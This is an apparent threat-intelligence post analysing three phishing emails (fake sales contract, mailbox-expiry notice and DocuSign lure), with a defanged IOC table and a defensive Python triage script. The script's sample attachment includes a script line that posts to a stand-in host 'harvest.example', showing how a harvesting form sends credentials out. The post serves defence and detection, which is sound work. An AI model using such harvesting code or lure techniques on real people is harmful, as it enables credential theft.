September 18, 2024
This phishing email masquerades as a sales contract that a client has supposedly requested. It pressures the recipient to make necessary corrections and verify all details before the payment is processed, creating a sense of urgency to entice the recipient into opening the attached files.
When opened, the HTML attachment builds an "Adobe Cloud Storage" credential harvesting form hosted on the recipient's local machine. Entering a password and clicking "View" sends the login credentials to a third-party server controlled by bad actors.
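An HTML attachment like the one described above can be triaged statically before anyone opens it. The Python sketch below is an added example, not code from the original post: it flags a file that contains a password field (in the markup or built by inline script) together with at least one remote host. The sample HTML and the host `harvest.example` are constructed placeholders.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s\"'<>)]+", re.I)
PW_RE = re.compile(r"type\s*[=:]\s*[\"']password[\"']", re.I)

# Constructed sample: the form is assembled by script, so no <input> tag exists
# in the static markup; harvest.example is a placeholder host.
SAMPLE = """<html><body><div id="root"></div><script>
document.getElementById("root").innerHTML =
  '<input type="password" id="pw"><input type="button" id="go" value="View">';
document.getElementById("go").onclick = () =>
  fetch("https://harvest.example/collect", {method: "POST", body: "..."});
</script></body></html>"""

class AttachmentTriage(HTMLParser):
    """Counts password fields and collects remote hosts the page can reach."""
    def __init__(self):
        super().__init__()
        self.password_fields, self.remote_hosts, self._in_script = 0, set(), False

    def _note(self, url):
        host = urlparse(url).hostname  # None for relative or empty URLs
        if host:
            self.remote_hosts.add(host.lower())

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        if tag == "input" and a.get("type", "").lower() == "password":
            self.password_fields += 1
        elif tag == "form":
            self._note(a.get("action", ""))
        elif tag == "script":
            self._in_script = True
            self._note(a.get("src", ""))

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:  # inline script: look for endpoints and built forms
            for url in URL_RE.findall(data):
                self._note(url)
            if PW_RE.search(data):
                self.password_fields += 1

def triage(html):
    p = AttachmentTriage()
    p.feed(html)
    p.close()
    return {"suspicious": p.password_fields > 0 and bool(p.remote_hosts),
            "password_fields": p.password_fields, "remote_hosts": sorted(p.remote_hosts)}
```

Attachments that encode or obfuscate their script will not match these patterns, so a clean result is inconclusive rather than a pass.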
This email deceptively claims to originate from the recipient's email service provider, urging them to click a link to prevent their mailbox from being deactivated within 48 hours due to an expired password.
However, the link actually directs them to a phishing site aimed at stealing their credentials.
This deceptive email is crafted to look like it’s from DocuSign, suggesting that the recipient has a document that is ready for their examination.
However, clicking the "Preview Document" button leads them to a malicious site designed to harvest their login information.
TYPE | IOC |
---|---|
FILE | 15c45b0f142cb6cf415aeed88c8b74c0dfe796a6e9ac5da2528f46c77d4dc9ad |
URL | hxxps[://]online[.]advancements[.]best/communication[.]aspx |
URL | hxxps[://]ipfs[.]io/ipfs/bafkreih3s4d2n2b74vd6zmfvebu2w3rxvb4x7r7awqxte55sf47kzt446m |
URL | hxxps[://]a[.]edic[.]blog/wbb/pdfz[.]php |
Threat Insights is a weekly series where we present you with analysis from samples we collect.